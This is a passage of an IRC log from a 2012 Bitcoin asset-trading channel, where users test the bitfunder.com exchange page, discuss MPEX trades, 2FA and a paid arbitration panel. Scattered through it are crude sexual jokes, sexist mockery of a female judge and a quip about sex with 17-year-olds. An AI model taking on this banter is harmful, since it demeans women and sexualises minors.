18:36:25 since its publically viewable I renamed some assets Nov 29 18:36:25 i cant buy stuff Nov 29 18:36:36 you logged in? Nov 29 18:36:39 yes Nov 29 18:36:42 i see balance 10btc Nov 29 18:36:44 ooh Nov 29 18:36:46 i know why Nov 29 18:36:46 i press buy Nov 29 18:36:46 1 sec Nov 29 18:36:49 nothing happens Nov 29 18:36:53 i mean Nov 29 18:36:54 yeah, 1 sdc Nov 29 18:36:58 page gets loaded Nov 29 18:37:00 ok Nov 29 18:37:06 brb Nov 29 18:37:27 try now Nov 29 18:38:00 nope Nov 29 18:38:02 you try it Nov 29 18:38:08 before you make me do it :) Nov 29 18:38:12 http://bitfunder.com/asset/BTSEE-Mining Nov 29 18:38:16 im here Nov 29 18:38:25 anyway be back in 20m or so Nov 29 18:38:42 hah, i didnt save Nov 29 18:38:42 -_- Nov 29 18:38:59 [MPEX] [S.MPOE] 27900 @ 0.00053194 = 14.8411 BTC [-] Nov 29 18:42:37 [MPEX] [S.BVPS] 552 @ 0.0032 = 1.7664 BTC [+] Nov 29 18:42:54 [MPEX] [S.MPOE] 12100 @ 0.00053194 = 6.4365 BTC [-] Nov 29 18:46:55 http://trilema.com/2012/the-mpex-rota/#comment-90753 << this is going well Nov 29 18:47:04 already 4 applications + 1 that's not up to form Nov 29 18:48:41 who is Rassah Nov 29 18:48:46 ;;getrating Rassah Nov 29 18:48:47 WARNING: Currently not authenticated. User Rassah, rated since Fri Jun 3 20:49:22 2011. Cumulative rating 5, from 3 total ratings. Received ratings: 3 positive, 0 negative. Sent ratings: 5 positive, 2 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Rassah Nov 29 18:49:45 ok brb for real now. Nov 29 18:50:19 [MPEX] [S.MPOE] 8800 @ 0.00053164 = 4.6784 BTC [-] Nov 29 18:52:39 [MPEX] [S.MPOE] 22950 @ 0.00053194 = 12.208 BTC [+] Nov 29 18:53:50 mircea_popescu do you feel it is appropriate to rate someone in return -> http://bitcoin-otc.com/viewratingdetail.php?nick=gigavps&sign=ANY&type=RECV Nov 29 18:54:13 i have received a negative rating from bitnumus, i guess because of gigamining Nov 29 18:54:18 nah Nov 29 18:54:29 i would very much advise against you rating in return for that sort of stuff Nov 29 18:54:47 [MPEX] [S.MPOE] 23150 @ 0.00053164 = 12.3075 BTC [-] Nov 29 18:54:49 [MPEX] [S.MPOE] 2800 @ 0.00053068 = 1.4859 BTC [-] Nov 29 18:56:19 i guess if you absolutely must you can go something like -1 I don't even know who this is or something Nov 29 18:57:02 i'll leave it alone Nov 29 18:57:21 prolly best. Nov 29 18:57:31 gigavps: I know that guy, I wonder why he has downrated you Nov 29 18:57:39 I might give him a nudge about it next time he comes on Nov 29 18:57:47 he doesn't like how i'm handling gigamining Nov 29 18:58:04 do you know this or just infer ? Nov 29 18:58:23 he's posted as much in the gigamining thread under the same handle Nov 29 18:58:27 a ok Nov 29 18:58:43 [MPEX] [S.MPOE] 5254 @ 0.00053194 = 2.7948 BTC [+] Nov 29 19:00:11 so nefario was going to release 3-4 assets a day a week ago Nov 29 19:00:13 [MPEX] [S.MPOE] 2800 @ 0.00053562 = 1.4997 BTC [+] Nov 29 19:00:25 meanwhile, about what, 7-8 ? issuers got partial lists. very partial. Nov 29 19:00:33 nefario is going to become a common noun. Nov 29 19:00:33 yeah, still no list here Nov 29 19:00:46 smickles on either of your things ? Nov 29 19:01:15 indeed, one might say, 'no list for neither ' Nov 29 19:01:44 lol Nov 29 19:07:10 mircea_popescu: glad to see we got Bill Cosby in the college Nov 29 19:08:20 who's that anyway ? Nov 29 19:08:33 and no we don't jsut yet, he's not even managed to apply correctly. Nov 29 19:09:01 http://bit.ly/1iMOYh Nov 29 19:10:27 o, that cosby Nov 29 19:10:38 ;D Nov 29 19:11:27 7739pirateat40-110gigavps2012-08-17 22:30:2310They don't come better. Nov 29 19:11:48 I find pirate's rating of gigavps kinda humorous, Nov 29 19:13:08 it's like the web is trying to say that a dodo has promised to be here, in person. Nov 29 19:14:42 [MPEX] [S.MPOE] 23800 @ 0.00053562 = 12.7478 BTC [+] Nov 29 19:14:46 mircea_popescu: cleaned up the asset view page Nov 29 19:14:52 ok i have just crashed BTSEE-Mining Nov 29 19:14:57 jurov https://bitcointalk.org/index.php?topic=102181.msg1365339#msg1365339 Nov 29 19:14:58 graphs alot biger now, and the buy/sell boxes can actually hold larger numbers Nov 29 19:15:05 and resizing shouldnt break the divs Nov 29 19:15:13 what's btsee-mining ? Nov 29 19:15:20 Ukto link ? Nov 29 19:15:34 http://bitfunder.com/asset/BTSEE-Mining Nov 29 19:15:45 yeah, that one Nov 29 19:15:54 i am gonna set it to force everyhing to https://bitfunder in a bit Nov 29 19:16:21 debating making a Graphs tab, to display a crap ton of diff graph versions Nov 29 19:16:30 candles, OHLC, depth, etc Nov 29 19:16:42 all very simple at this point Nov 29 19:16:44 istead of 'my bid' in the orderbook Nov 29 19:16:52 put a button that says 'cancel bid' Nov 29 19:17:05 there is enough room Nov 29 19:17:08 that I can put both Nov 29 19:17:14 thanks to my recent resizing Nov 29 19:17:19 just the button Nov 29 19:17:24 [MPEX] [S.MPOE] 656 @ 0.00053562 = 0.3514 BTC [+] Nov 29 19:17:28 ppl are dumb Nov 29 19:17:33 besides Nov 29 19:17:37 i would like something extra to fill inthe line Nov 29 19:17:38 :P Nov 29 19:17:49 so you are making it less useful cause people are dumb Nov 29 19:17:53 bad argument Nov 29 19:18:01 what's My Ask ? Nov 29 19:19:22 http://shrani.najdi.si/?5/7K/1x7WlaZC/nybid.png Nov 29 19:19:26 my bid Nov 29 19:19:28 in this case Nov 29 19:19:43 now i have to go cancel it on a seperate page Nov 29 19:19:46 lame :p Nov 29 19:20:00 theres like 27 ways how to fix it Nov 29 19:23:18 eh jesus that's a waste. just put a * or something next to it Nov 29 19:23:21 with a tooltip maybe Nov 29 19:23:30 the main point is Nov 29 19:23:39 that one should be able to cancel it from there Nov 29 19:24:20 bitstamp has it like that Nov 29 19:24:25 and it works Nov 29 19:24:40 well hey have it implemented only hallf way Nov 29 19:24:45 but better than nothing Nov 29 19:25:37 there Nov 29 19:25:39 i was thinking something like that Nov 29 19:25:44 for a cancel button on the order page Nov 29 19:25:51 better Nov 29 19:26:02 debating using red button tho Nov 29 19:26:04 instead of blue Nov 29 19:26:08 since it is a 'cancel' Nov 29 19:26:14 but cancling isnt the endof the world tpe thing Nov 29 19:26:16 so meh Nov 29 19:26:47 just put it in tags and it will be fine Nov 29 19:28:36 [MPEX] [S.MPOE] 17700 @ 0.00053562 = 9.4805 BTC [+] Nov 29 19:33:54 [MPEX] [S.MPOE] 18094 @ 0.00053562 = 9.6915 BTC [+] Nov 29 19:33:55 [MPEX] [S.MPOE] 3256 @ 0.00053602 = 1.7453 BTC [+] Nov 29 19:35:35 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.27088322 = 270.8832 BTC [-] Nov 29 19:49:07 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.2714765 = 271.4765 BTC [+] Nov 29 19:49:55 [MPEX] [S.MPOE] 6294 @ 0.00053602 = 3.3737 BTC [+] Nov 29 19:49:56 [MPEX] [S.MPOE] 6800 @ 0.00053637 = 3.6473 BTC [+] Nov 29 19:49:58 [MPEX] [S.MPOE] 4100 @ 0.00053677 = 2.2008 BTC [+] Nov 29 19:53:50 [MPEX] [S.MPOE] 3850 @ 0.0005356 = 2.0621 BTC [-] Nov 29 19:56:31 http://jcph.am/2012/11/29/the-common-man/ Nov 29 19:56:40 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.2714765 = 271.4765 BTC [+] Nov 29 19:59:15 o look he has a blog! Nov 29 19:59:34 jcpham didja see http://trilema.com/2012/the-mpex-rota/ ? Nov 29 19:59:43 sup Nov 29 19:59:47 you rang me? Nov 29 20:00:43 yee Nov 29 20:01:06 Will be interesting to see who wants to risk 10 BTC on messing with missy -PR. Nov 29 20:01:10 hahahaha Nov 29 20:01:15 :D Nov 29 20:02:29 why are the judges necessary Nov 29 20:02:46 mircea_popescu can just rule with an iron fist Nov 29 20:02:51 and is there a chance that someone will fly me to romania Nov 29 20:03:09 jcpham so someone can judge ? lol. Nov 29 20:03:16 shit. Nov 29 20:03:50 so this is how mpex disputes are to be resolved? Nov 29 20:03:51 gigavps i usually rule with a D cup tit. Nov 29 20:04:15 well i think disputes in general, but sure. Nov 29 20:04:27 ic Nov 29 20:04:47 in the sense that if you sue me i'll prolly pay to find out Nov 29 20:04:51 making a plaintiff pay a fee is a good idea Nov 29 20:04:58 knock out those false claims Nov 29 20:05:38 well, he gets it back if he's right Nov 29 20:06:32 basically, as a judge, you know for a fact you get 30 BTC if you last a year, + 3 btc a case, no matter how you decide it. Nov 29 20:06:49 so it's not exactly slavery, but i guess maybe not really far off. Nov 29 20:07:03 are you offering me the job :) Nov 29 20:07:15 it sounds like you are tbh Nov 29 20:07:56 i mean, you are saying bllah blah this and blah blah that Nov 29 20:08:10 but all i see is "i reaaly really reaaly want you jcpham" Nov 29 20:08:40 hehehe Nov 29 20:08:46 you can apply! Nov 29 20:08:53 yay Nov 29 20:09:33 mircea, thanks for notification, I replied. And wasn't particularly kind to BTCT. Nov 29 20:10:01 https://bitcointalk.org/index.php?topic=102181.msg1367058#msg1367058 Nov 29 20:11:23 i c Nov 29 20:12:26 ;;gpg info jcpham Nov 29 20:12:26 User 'jcpham', with keyid C71FB5ED6ACE04AF, fingerprint F7299BD73879E866613EAB24C71FB5ED6ACE04AF, and bitcoin address 16zaKwZC6n9BMipwLbewYGn8NXEgmN2f3Y, registered on Fri Nov 11 09:21:29 2011. http://bitcoin-otc.com/viewgpg.php?nick=jcpham . Currently authenticated from hostmask jcpham!~jcpham@unaffiliated/jcpham . Nov 29 20:13:34 pr's comments re public nuisance : "there should be a cancan ice cream parlor" Nov 29 20:15:13 jcpham it's not a contest you realise ? the idea is to have a buncha judges. Nov 29 20:15:27 NO! Nov 29 20:15:33 it's a contest and i just won it Nov 29 20:16:00 thanks to you mircea_popescu Nov 29 20:16:15 aokthan Nov 29 20:16:29 [MPEX] [S.DICE] 1400 @ 0.00333439 = 4.6681 BTC [+] Nov 29 20:16:33 w/e Nov 29 20:16:44 i don't mind settling disputes with an iron fist Nov 29 20:17:48 i wonder if there's porn of it. Nov 29 20:18:01 disputes-being-settled-with-iron-fist.com Nov 29 20:18:02 iron-fist porn? Nov 29 20:18:14 sounds like wu-tang's next album Nov 29 20:18:41 wow wu tang still exists ? Nov 29 20:18:57 shrug idk! they exist in my heart though Nov 29 20:22:35 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.27206883 = 272.0688 BTC [+] Nov 29 20:28:40 [MPEX] [S.MPOE] 3800 @ 0.00053634 = 2.0381 BTC [+] Nov 29 20:31:13 https://bitcointalk.org/index.php?topic=128397.msg1366929#msg1366929 Nov 29 20:31:20 la resistance Nov 29 20:37:17 kakobreklaaa: hmm, there is an issue with the cancel button being there Nov 29 20:37:19 I have to figure out Nov 29 20:37:47 right now, if you bid for 1 share.. and then bid another at the same price.. it creates 2 trades Nov 29 20:37:53 I really should change it to stack into the saem Nov 29 20:37:56 no reason not to Nov 29 20:38:01 will fix the cancel button issue Nov 29 20:39:26 dont you use some uniqe id for the bids and asks? Nov 29 20:40:18 I do Nov 29 20:40:27 but the bids/asks table groups total shares by price Nov 29 20:40:38 ah Nov 29 20:40:47 either way, I am fizzing it up Nov 29 20:41:02 no reason to have seperate db items for multiple of the same asset at the same price Nov 29 20:41:03 its just a waset Nov 29 20:41:06 waste Nov 29 20:43:17 kakobreklaaa la resistance du temps fondue lol Nov 29 20:43:54 resistance melted time? Nov 29 20:44:03 :D Nov 29 20:44:40 omg i am told rassah actually is a girl. Nov 29 20:44:49 a GIRL JUDGE ?! is this possible ? Nov 29 20:44:59 we're boned Nov 29 20:45:02 :o Nov 29 20:45:02 ahahaha Nov 29 20:45:05 on the interwebs! Nov 29 20:45:15 pencil in the pooper. Nov 29 20:45:16 Boned On The Interwebs. A tru story. Nov 29 20:45:54 kakobreklaaa it's sharpie in pooper you person of dubious eastern european origin you Nov 29 20:46:10 ah sorry. Nov 29 20:50:56 I got fucked by a lady judge Nov 29 20:51:08 [MPEX] [S.MPOE] 24498 @ 0.0005356 = 13.1211 BTC [-] Nov 29 20:51:09 [MPEX] [S.MPOE] 6250 @ 0.00053552 = 3.347 BTC [-] Nov 29 20:51:11 [MPEX] [S.MPOE] 12650 @ 0.00053398 = 6.7548 BTC [-] Nov 29 20:51:12 [MPEX] [S.MPOE] 5608 @ 0.00053283 = 2.9881 BTC [-] Nov 29 20:51:13 [MPEX] [S.MPOE] 6644 @ 0.00053276 = 3.5397 BTC [-] Nov 29 20:53:11 and not in that good way Nov 29 20:53:19 [MPEX] [S.MPOE] 14300 @ 0.00053634 = 7.6697 BTC [+] Nov 29 20:53:32 in the ass ? Nov 29 20:53:50 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.27206883 = 272.0688 BTC [+] Nov 29 21:00:23 [MPEX] [S.MPOE] 9000 @ 0.00053634 = 4.8271 BTC [+] Nov 29 21:00:24 [MPEX] [S.MPOE] 14450 @ 0.0005364 = 7.751 BTC [+] Nov 29 21:01:51 with a hammer? Nov 29 21:02:15 [MPEX] [S.MPOE] 24100 @ 0.0005364 = 12.9272 BTC [+] Nov 29 21:03:36 [MPEX] [S.MPOE] 5756 @ 0.00053276 = 3.0666 BTC [-] Nov 29 21:03:38 [MPEX] [S.MPOE] 19344 @ 0.00053271 = 10.3047 BTC [-] Nov 29 21:05:11 assgavel Nov 29 21:16:09 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.2726602 = 272.6602 BTC [+] Nov 29 21:16:48 [MPEX] [S.MPOE] 10766 @ 0.0005364 = 5.7749 BTC [+] Nov 29 21:16:50 [MPEX] [S.MPOE] 14700 @ 0.00053677 = 7.8905 BTC [+] Nov 29 21:16:50 [MPEX] [S.MPOE] 8150 @ 0.00053682 = 4.3751 BTC [+] Nov 29 21:16:51 [MPEX] [S.MPOE] 4554 @ 0.0005369 = 2.445 BTC [+] Nov 29 21:16:53 [MPEX] [S.MPOE] 12300 @ 0.00053695 = 6.6045 BTC [+] Nov 29 21:16:54 [MPEX] [S.MPOE] 252 @ 0.00053698 = 0.1353 BTC [+] Nov 29 21:32:57 [MPEX] [S.MPOE] 3941 @ 0.00053698 = 2.1162 BTC [+] Nov 29 21:40:54 [MPEX] [S.MPOE] 28900 @ 0.00053698 = 15.5187 BTC [+] Nov 29 21:45:55 with a sharpie? Nov 29 21:47:24 lol Nov 29 21:51:17 lol assgavel Nov 29 21:51:36 according to map on www.sharpie.com, any sharpies in eastern europe was there exported illegally. Nov 29 21:51:47 *were Nov 29 21:52:16 d'uh. Nov 29 21:52:48 jurov you have work to do https://bitcointalk.org/index.php?topic=118551.msg1367295#msg1367295 Nov 29 21:53:19 [MPEX] [S.MPOE] 18600 @ 0.00053582 = 9.9663 BTC [-] Nov 29 21:53:53 oh no... Nov 29 21:54:09 maybe i can concoct something involving postal pigeons and bottles thrown into the sea Nov 29 21:54:36 [MPEX] [S.MPOE] 1857 @ 0.00053698 = 0.9972 BTC [+] Nov 29 21:54:38 [MPEX] [S.MPOE] 8582 @ 0.00053718 = 4.6101 BTC [+] Nov 29 21:54:39 [MPEX] [S.MPOE] 2461 @ 0.00053732 = 1.3223 BTC [+] Nov 29 21:55:35 but that will wait. now i'm entagled in postgres locking intricacies Nov 29 21:56:01 further reading http://polimedia.us/dtng/c/res/17150.html Nov 29 21:56:42 lol wait. he wants to use coinbr to offer mpex stuff on his exchange ? Nov 29 22:00:24 wow, icbit closed unchanged from yesterday Nov 29 22:02:23 how much is it yet ? Nov 29 22:03:51 12.31 Nov 29 22:04:34 hola Nov 29 22:04:42 hallo Nov 29 22:04:42 [MPEX] [S.MPOE] 2345 @ 0.00053604 = 1.257 BTC [-] Nov 29 22:04:43 [MPEX] [S.MPOE] 3857 @ 0.00053582 = 2.0667 BTC [-] Nov 29 22:04:44 howdy Nov 29 22:04:44 [MPEX] [S.MPOE] 6798 @ 0.00053466 = 3.6346 BTC [-] Nov 29 22:04:50 ;;ticker Nov 29 22:04:51 BTCUSD ticker | Best bid: 12.48898, Best ask: 12.48899, Bid-ask spread: 0.00001, Last trade: 12.48898, 24 hour volume: 25387.36802085, 24 hour low: 12.15000, 24 hour high: 12.59900, 24 hour vwap: 12.39307 Nov 29 22:05:04 so just .15 under the actual exchange rate. Nov 29 22:05:12 yup Nov 29 22:05:13 better than the historical .5 i guess. still way off imo\ Nov 29 22:05:25 [MPEX] [S.MPOE] 2345 @ 0.00053491 = 1.2544 BTC [+] Nov 29 22:05:26 [MPEX] [S.MPOE] 13155 @ 0.00053466 = 7.0335 BTC [-] Nov 29 22:05:28 [MPEX] [S.MPOE] 1700 @ 0.00053429 = 0.9083 BTC [-] Nov 29 22:05:48 jurov concoct what with pigeons ? Nov 29 22:06:09 anything to do with cocts and pigeons is a win Nov 29 22:07:18 [MPEX] [S.DICE] 5800 @ 0.00333439 = 19.3395 BTC [+] Nov 29 22:07:20 [MPEX] [S.DICE] 137 @ 0.00333118 = 0.4564 BTC [-] Nov 29 22:07:21 [MPEX] [S.DICE] 3650 @ 0.00330716 = 12.0711 BTC [-] Nov 29 22:07:22 [MPEX] [S.DICE] 3900 @ 0.00330565 = 12.892 BTC [-] Nov 29 22:07:23 [MPEX] [S.DICE] 900 @ 0.0033034 = 2.9731 BTC [-] Nov 29 22:07:24 [MPEX] [S.DICE] 2150 @ 0.00329555 = 7.0854 BTC [-] Nov 29 22:07:25 [MPEX] [S.DICE] 2500 @ 0.00329177 = 8.2294 BTC [-] Nov 29 22:07:26 [MPEX] [S.DICE] 1100 @ 0.00329018 = 3.6192 BTC [-] Nov 29 22:07:27 [MPEX] [S.DICE] 648 @ 0.00328901 = 2.1313 BTC [-] Nov 29 22:07:28 [MPEX] [S.DICE] 6715 @ 0.00328634 = 22.0678 BTC [-] Nov 29 22:07:56 did satoshidice just lose a bunch of money or something ? Nov 29 22:09:28 mircea_popescu, the coinbr to mpex order submission process Nov 29 22:09:42 o Nov 29 22:09:54 Maybe someone just wanted some BTC? Nov 29 22:09:59 [MPEX] [S.MPOE] 18500 @ 0.00053429 = 9.8844 BTC [-] Nov 29 22:10:01 [MPEX] [S.MPOE] 6650 @ 0.00053404 = 3.5514 BTC [-] Nov 29 22:10:02 o o, burnside you the btcsomething new exchange guy ? Nov 29 22:10:12 Doffx don't be silly, who would want btc. Nov 29 22:10:16 Once Deadterra gets the Glbse Info it will be even bigger selloff im sure Nov 29 22:10:17 it's monopoly money Nov 29 22:10:18 yeah, sorta I guess. Nov 29 22:10:35 So they can transfer it to Fiat Duh Nov 29 22:10:38 a ok. jurov you prolly know as rinisomething. runs coinbr Nov 29 22:11:01 it's one of a lot of projects. :) Nov 29 22:11:03 Doffx fiat is a scam Nov 29 22:11:13 That is for sure. Nov 29 22:11:17 yes, i've got kinda split personality, rini17 is my other half Nov 29 22:11:30 is it because you're really 17 ? Nov 29 22:11:31 coinbr, they batch the orders? Nov 29 22:11:44 i was 17 once Nov 29 22:11:56 me too... a long time ago Nov 29 22:12:20 well... as long as you're doing 17 yos it dun matter anyway. Nov 29 22:12:34 rini17 is your pr? Nov 29 22:12:46 burnside, coinbr does not any batching. and hopefully never will do. Nov 29 22:13:03 what'd be the benefit anyway ? Nov 29 22:13:08 [MPEX] [S.MPOE] 9430 @ 0.00053404 = 5.036 BTC [-] Nov 29 22:13:10 [MPEX] [S.MPOE] 5856 @ 0.00053271 = 3.1195 BTC [-] Nov 29 22:13:11 [MPEX] [S.MPOE] 8114 @ 0.00053216 = 4.3179 BTC [-] Nov 29 22:13:24 not sure, just saw all the orders come thru at once on s.dice Nov 29 22:13:34 i don't think that was coinbr Nov 29 22:14:25 ahhh, I misunderstood Nov 29 22:14:30 np Nov 29 22:14:37 with coinbr you'd actually have a problem to submit multiple orders at once, there's kinda protection on order form and more Nov 29 22:14:51 but in general, if a single sell/buy crosses multiple bid/asks on the book it'll spark a bunch of lines Nov 29 22:15:07 ^ this Nov 29 22:15:16 that makes sense, ditto for btctc Nov 29 22:15:33 do you have a twitter tradestream somewhere for that ? Nov 29 22:15:34 tho, sadly, I do not have an assbot Nov 29 22:15:46 [MPEX] [S.MPOE] 2345 @ 0.00053716 = 1.2596 BTC [+] Nov 29 22:15:46 [MPEX] [S.MPOE] 24005 @ 0.00053732 = 12.8984 BTC [+] Nov 29 22:15:49 nah, twitter rate limits... no good. Nov 29 22:16:16 it does ? Nov 29 22:16:35 yeah, the glbse feed was missing stuff because of it Nov 29 22:17:07 hum i wasn't aware it eats things. Nov 29 22:17:22 like sharpies? Nov 29 22:17:33 i know it ate identical updates, but i added a fix for that Nov 29 22:17:39 not necessarily eating them, just replies when you make the post that you're posting too fast Nov 29 22:17:39 you sure glbse didn't have the same issue ? Nov 29 22:18:04 not sure, don't have the background. Nov 29 22:18:04 gigavps lets not go into that :p Nov 29 22:18:23 o Nov 29 22:18:28 [MPEX] [S.MPOE] 2345 @ 0.0005323 = 1.2482 BTC [-] Nov 29 22:18:29 [MPEX] [S.MPOE] 3855 @ 0.00053216 = 2.0515 BTC [-] Nov 29 22:18:31 http://polimedia.us/dtng/c/src/135422020536.jpg schoolgirls today. Nov 29 22:21:52 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.19216735 = 192.1674 BTC [-] Nov 29 22:23:18 jurov http://live.coinbr.com/?mpsic=S.MPOE i want to click on 7day. why can't i click on 7 day ;/ Nov 29 22:26:00 say "please" :P Nov 29 22:26:06 please! Nov 29 22:26:16 lol Nov 29 22:26:24 mircea_popescu subbing for a change Nov 29 22:26:27 burnside also meet Ukto , he runs what was it Nov 29 22:26:44 bitfunder.com Nov 29 22:26:48 if the broker goes broke, do I have a problem? Nov 29 22:26:54 ? Nov 29 22:27:04 burnside: sup :) Nov 29 22:27:20 another gem from coinbr thread...i'd rather go add the 7d link Nov 29 22:27:22 jurov which broker or what ? Nov 29 22:27:35 lol Nov 29 22:28:12 kumala ocasionally shows up, he runs cryptostocks Nov 29 22:28:27 (which is different from cryptoexchange ; linked to vircurex iirc) Nov 29 22:28:48 Ukto, hey there. Nov 29 22:29:09 Ukto, what do you run? Sorry, working my day job atm. Nov 29 22:29:53 [MPEX] [S.MPOE] 2345 @ 0.00053701 = 1.2593 BTC [+] Nov 29 22:29:54 [MPEX] [S.MPOE] 13005 @ 0.00053732 = 6.9878 BTC [+] Nov 29 22:31:35 burnside: getting ready to launch https://bitfunder.com Nov 29 22:31:39 in test mode atm Nov 29 22:32:17 oh hey, nice Nov 29 22:33:04 re-doing some sql + keys sets Nov 29 22:33:10 to make things far more efficinet Nov 29 22:33:13 efficient Nov 29 22:33:15 even Nov 29 22:33:18 it definitely looks good, lovethe design Nov 29 22:33:22 and then gotta setup the API sys Nov 29 22:33:23 thanks Nov 29 22:33:28 look unter BTSEE-mining Nov 29 22:33:31 under the profile tab Nov 29 22:33:36 the oldest news item is riot Nov 29 22:33:37 :P Nov 29 22:33:37 seems everyone loves bootstrap Nov 29 22:33:54 mircea_popescu: it looks nice (if done right) and makes life simple Nov 29 22:33:54 you should bootstrap mpex Nov 29 22:34:11 yeh. if you want help I would be happy to toss in some knowldge :) Nov 29 22:34:20 still learning alot of the fancynesses tho Nov 29 22:34:38 dub i am too old for these new foppish styles Nov 29 22:34:57 lol, that'll be the day. (pirate returns deposits) Nov 29 22:34:58 I did almost all of bitfunder in bootstrap.. only recently started adding any extra jquery to do special stuffs Nov 29 22:35:04 hehe Nov 29 22:35:08 did you read the actual article part? Nov 29 22:35:09 :P Nov 29 22:35:21 click to expand it Nov 29 22:35:40 asset issuers can easily draft, edit, and then post newslettes Nov 29 22:35:49 do you mail them ? Nov 29 22:35:55 was debating it as an option Nov 29 22:35:56 that's pretty smooth Nov 29 22:36:00 mircea_popescu: would be fun though Nov 29 22:36:01 havent touched the mail options stuff yet Nov 29 22:36:08 may run into problems with email volume Nov 29 22:36:13 'notifications' technically Nov 29 22:36:14 nah Nov 29 22:36:22 i ran a sort of romanian reddit + my blog, ended up sending in the low k's emails each day Nov 29 22:36:23 I have a special email service I use Nov 29 22:36:27 it ocasionally was a pain Nov 29 22:36:30 I'm gonna get my ass handed to me. ;) Nov 29 22:36:40 being in the hosting business Nov 29 22:36:46 i have had my share of mailers Nov 29 22:36:54 burnside in finance the tech part is the smaller half of the cake. Nov 29 22:36:57 I'm with MP... too old school. Nov 29 22:36:58 and dealing with how to make good mailers work right, and getting rid of the 'spammers' Nov 29 22:37:08 many people can make nice websites, the idea is to not fuck up. Nov 29 22:37:10 burnside: which is yours? Nov 29 22:37:18 mircea_popescu: tell me about it Nov 29 22:37:30 btct.co Nov 29 22:38:16 oh Nov 29 22:38:16 [MPEX] [S.MPOE] 2345 @ 0.00053222 = 1.2481 BTC [-] Nov 29 22:38:17 [MPEX] [S.MPOE] 7854 @ 0.00053216 = 4.1796 BTC [-] Nov 29 22:38:18 >,> Nov 29 22:38:31 I apologize if I have said anything that might sound negative towards the design on the site Nov 29 22:38:32 :P Nov 29 22:38:38 lmao Nov 29 22:38:40 lol Nov 29 22:38:56 actually, I'd like to hear what you have to say Nov 29 22:39:03 that btct.co website design sucks balls omg Nov 29 22:39:08 something like that ? Nov 29 22:39:09 first time here, so I haven't caught anything b4 today Nov 29 22:39:18 burnside you may wish to get an actual client Nov 29 22:39:22 web doesn't keep logs. Nov 29 22:39:29 its not that bad, was just talking shit Nov 29 22:39:32 it needs some.. Nov 29 22:39:34 fixing up Nov 29 22:39:45 it actualyl looks diff though Nov 29 22:39:47 from when I looked before Nov 29 22:39:50 last time, things were misaligned Nov 29 22:39:52 yeah, i'll have to dl one... haven't been on irc in years. Nov 29 22:40:00 used to use some cli ones on linux Nov 29 22:40:09 me either. i used to hook up on irc in the 90s Nov 29 22:40:21 then forgot about it... then got sucked in with bitcoin again Nov 29 22:40:23 burnside: have you changed the layout of the page at all lately? Nov 29 22:40:42 Ukto, I don't think so... Nov 29 22:40:51 [MPEX] [S.MPOE] 4255 @ 0.00053216 = 2.2643 BTC [-] Nov 29 22:40:52 [MPEX] [S.MPOE] 5645 @ 0.00053068 = 2.9957 BTC [-] Nov 29 22:40:55 mostly been working on some of the features. Nov 29 22:40:59 Ukto are you thinking of the mpex clone someone came up with ? Nov 29 22:41:08 the core is solid, been running a couple months on the LTC side of things Nov 29 22:41:09 might have been Nov 29 22:41:15 this looks similar to what I remember htough Nov 29 22:41:29 but yeah, I looked at it on my phone the other day and it needs some tweaks Nov 29 22:41:31 but the bonds/funds tables were badly aligned with each other Nov 29 22:41:40 and there was alot more green Nov 29 22:42:20 also, personal opinion, I dont like the user/pass fields location. kinda space wastey Nov 29 22:42:49 yeah, could move 'em to just the index page Nov 29 22:42:51 or a login page Nov 29 22:42:56 anyone actually implement 2fa yet ? Nov 29 22:43:07 mircea_popescu: mines been there since the get go Nov 29 22:43:11 [MPEX] [S.MPOE] 8593 @ 0.00053068 = 4.5601 BTC [-] Nov 29 22:43:13 [MPEX] [S.MPOE] 19069 @ 0.00053064 = 10.1188 BTC [-] Nov 29 22:43:15 I have google 2fa on weex, hp, and bf Nov 29 22:43:21 its a musta have Nov 29 22:43:23 yeah, I think I added it a week or two after launch on ltc-global Nov 29 22:43:27 and like 5 min to implement Nov 29 22:43:34 that's good. Nov 29 22:43:38 burnside: the site is launched? Nov 29 22:43:47 imo google 2fa may be better than the dongle. just my opinion Nov 29 22:43:52 litecoinglobal.com been running for months Nov 29 22:44:09 oh. somehow i was associating the beta msg at the top, as test mode Nov 29 22:44:10 not sure why Nov 29 22:44:13 I like the google, just because I hate having lots of devices Nov 29 22:44:23 nah, "public beta" Nov 29 22:44:31 you use it while I break it. Nov 29 22:44:31 should write 'Live Beta' Nov 29 22:44:38 that works too Nov 29 22:44:42 Thats what I do Nov 29 22:44:46 I get away with all kinda things Nov 29 22:44:47 :P Nov 29 22:44:54 do like Zynga Nov 29 22:44:57 permenant "beta" status Nov 29 22:45:04 any problems, just blame it on the fact of being a beta Nov 29 22:45:05 :P Nov 29 22:45:13 glbse did the same thing Nov 29 22:45:21 "Farmville" was always beta. now 2 is out Nov 29 22:45:24 yeah, I don't think I'll be permanently beta, but definitely for the next couple months Nov 29 22:45:25 and guess what, its beta! Nov 29 22:45:25 :P Nov 29 22:45:29 heh Nov 29 22:45:42 ;;seen nefario Nov 29 22:45:43 nefario was last seen in #bitcoin-assets 9 weeks, 3 days, 0 hours, 45 minutes, and 48 seconds ago: Those assets are not listed or traded anymore Nov 29 22:45:44 yeah, kind of a legal get out of jail free card. Nov 29 22:45:50 I might just go Delta. Nov 29 22:45:52 yeah Nov 29 22:46:01 wont get you out of a scammer tag tho ;) Nov 29 22:46:14 besides, with bitcoins, i have my ToS because its the truth Nov 29 22:46:15 lol, no Nov 29 22:46:26 anyone who says anything otherwise, its kind of a lie Nov 29 22:46:36 esp w/o real id, and verification Nov 29 22:46:39 etc Nov 29 22:46:46 o btw, you two have seen http://trilema.com/2012/the-mpex-rota/ ? Nov 29 22:46:59 use an anonymous service anonymously, and get anonymous reprecutionions. Nov 29 22:47:02 heh, yeah, your ToS cracked me up Nov 29 22:47:53 mircea_popescu: LOL Nov 29 22:47:53 nice Nov 29 22:48:18 should be a better way than the forum scmamer tag Nov 29 22:48:28 MP, that's pretty cool. Nov 29 22:48:38 sooner or later I'll spend some time figuring out WoT Nov 29 22:48:48 thought it was funny when ppl called for a scammer tag on theymos :P Nov 29 22:48:49 actually i'ma see if theymos won't just enforce scammer tags if ordered there. should make it easier for mods. Nov 29 22:49:02 Ukto people, i think that was my ever-loving pr chick. Nov 29 22:49:05 been a low priority, I have enough about me out on the 